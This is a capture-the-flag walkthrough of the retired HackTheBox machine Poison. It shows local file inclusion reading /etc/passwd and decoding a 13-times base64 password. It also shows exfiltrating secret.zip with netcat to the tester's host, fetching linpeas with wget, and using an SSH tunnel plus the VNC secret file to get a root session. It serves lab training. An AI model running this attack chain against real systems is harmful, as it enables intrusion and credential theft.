HackTheBox - Retired - Poison

HackTheBox - Retired - Poison

Recon

I've been using threader lately to do my initial scanning. It's a threaded scanner written in python by Joe Helle https://twitter.com/joehelle

You just supply an IP and it does a quick threaded up/down scan on all TCP ports and then pipes the results into a nmap scan for you.

And saves the outputs as xml for you too

Which I then convert the nmap output to HTML to make it a bit easier to digest

xsltproc 10.10.10.84.xml -o poison.html

Not much open here just port 80 and 22

Port 80 Apache 2.4.29
Port 22 OpenSSH 7.2

Well we know we will need a password for ssh or a key at least, let's look at 80 to see what it's serving up.  I'll add poison.htb to my /etc/hosts to make it a be easier

A temporary website to test local. Php scripts….. This sounds really promising to get a foothold here.

So here it states there are 4 files that can be tested.

1st thing I did was try not supplying a script.

Caught an error about the filename being empty…

Ok what if I supply a php name that is not in the approved list.

Ok can't open the file because it can't find it. Make sense…

Next I tried to see if we could get to other directories with LFI

We sure can, here is the /etc/passwd file.

Here it is kinda cleaned up a bit

em &:/:/usr/sbin/nologin bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin games:*:7:13:Games pseudo-user:/:/usr/sbin/nologin news:*:8:8:News Subsystem:/:/usr/sbin/nologin man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin unbound:*:59:59:Unbound DNS Resolver:/var/unbound:/usr/sbin/nologin proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin _pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin _dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin auditdistd:*:78:77:Auditdistd unprivileged user:/var/empty:/usr/sbin/nologin www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin

Ok let's check out the scripts they will let us get to.

Ini.php

Looks like some configuration settings, i don't see anything interesting popping out immediately to me what is the next script?

Info.php

Little bit of data leakage here, we can see this is a 64bit FreeBSD system 

What's next?

Listfiles.php

It looks like this list the files in the directory we have access too… and there is a file not mentioned on the site pwdbackup.txt  …. Let's check out the next file and then we will come back to this.

Phpinfo.php

This is the generic phpinfo output, it does leak a little more info like the phpversion 5.6.32 - which is kind of old but might not have been when this box was created.

But what about that pwdbackup.txt file

Let's plug that in and see what we get out.

They say it's an encoded version of their password…. Notice they don't say encrypted..

Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVU bGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBS bVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVW M040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRs WmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYy eG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01G WkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYw MXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVa T1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5k WFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZk WGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0 NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZT Vm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZz WkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBW VmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpOUkd4RVdub3dPVU5uUFQwSwo=

So the first thing I notice here is this looks like base64… one of the biggest tips for identifying base464 is trailing "=" This is padding, there might not be any = there might be two == there might be three ===. This is because of the encoding if the info being coded is not divisible by 4 bytes then it sticks these equal signs at the end until it is divisible by 4 bytes.

So they claim it's encoded at least 13 times.

I save the base64 to my kali machine in a file named passwd.txt ( make sure to remove any spaces if you copy and paste)

Then I wanted to see if the result of base64 -d on the file would still look like base64

So I ran

Cat ./passwd.txt | base64 -d

Still looks like base64, there is no equal sign for padding at the end, but that might be because this encoding was divisible by 4 bytes so no padding was needed.  

Long story short.. I kept adding "| base64-d"

And checking the output to see if it looked strange or still base64.

Until I hit the 13 decoding which stopped looking like base64

cat passwd.txt  | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d

I'm sure there is a better way to loop this, but this was easy and I could keep an eye on the output in case they changed encoding methods.

Charix!2#4%6&8(0

This was the final output, if we base64 -d one more time it says invalid input.

So now we have a password…. But for what?

Right now I'm assuming it's for ssh

There was one user in the passwd file we found on the server earlier that looks at lot like this

charix

            Maybe next time they can just draw us a map

Exploit

ssh charix@poison.htb

And we are in.

And now we can read out user.txt

There is another file named secret.zip in this directory let's grab it and see what is inside.

I justed netcat to send it over to my kali box.

This just requires a listener first

So on my kali box i did

Nc -lnvp 5555 > secret.zip

Then on the poison box

Nc 10.10.14.6 5555 < secret.zip

It was a small file so it transferred quickly

When we try to unzip it, it asks for a password. I first tried fcrackzip with rockyou to break the password but it didn't find a successful password.

What about the same password we used to ssh?

Yup that worked, but the file itself just looks like garbage.

Let's try to find another escalation path.

I used simpeHTTPServer to download linpeas on to poison.

python -m SimpleHTTPServer8080

Then on poison

wget http://10.10.14.6:8080/linpeas.sh

Then gave it execution rights

chmod +x ./linpeas.sh

I ran the script and saw a couple of things in the output that were interesting.

Vnc is running as root.

VNC usually runs on port 5900 and our nmap scan didn't see it running.

Netstat confirms that something is running on 5901 and 5801

This might be vnc.

But its not accessible to the world so I can't get to it directly.

But we try an SSH tunnel to connect.

                

ssh -L 5555:localhost:5901 charix@poison.htb

So we are saying: any traffic sent to our local port of 5555, forward that over this tunnel to 5901 on poison over our SSH tunnel.

Now we can try to connect to the VNCServer

vncviewer localhost:5555

Looks like the tunnel is working because we are prompted for a password.

But we don't know this password….

But like other protocols we can give vnc a file for authentication, instead of a password…. Like maybe that secret we found earlier?

vncviewer localhost:5555 -passwd /home/circusmonkey404/Desktop/HTB/poison/secret

And with that we are presented with a VNC session to poison as root.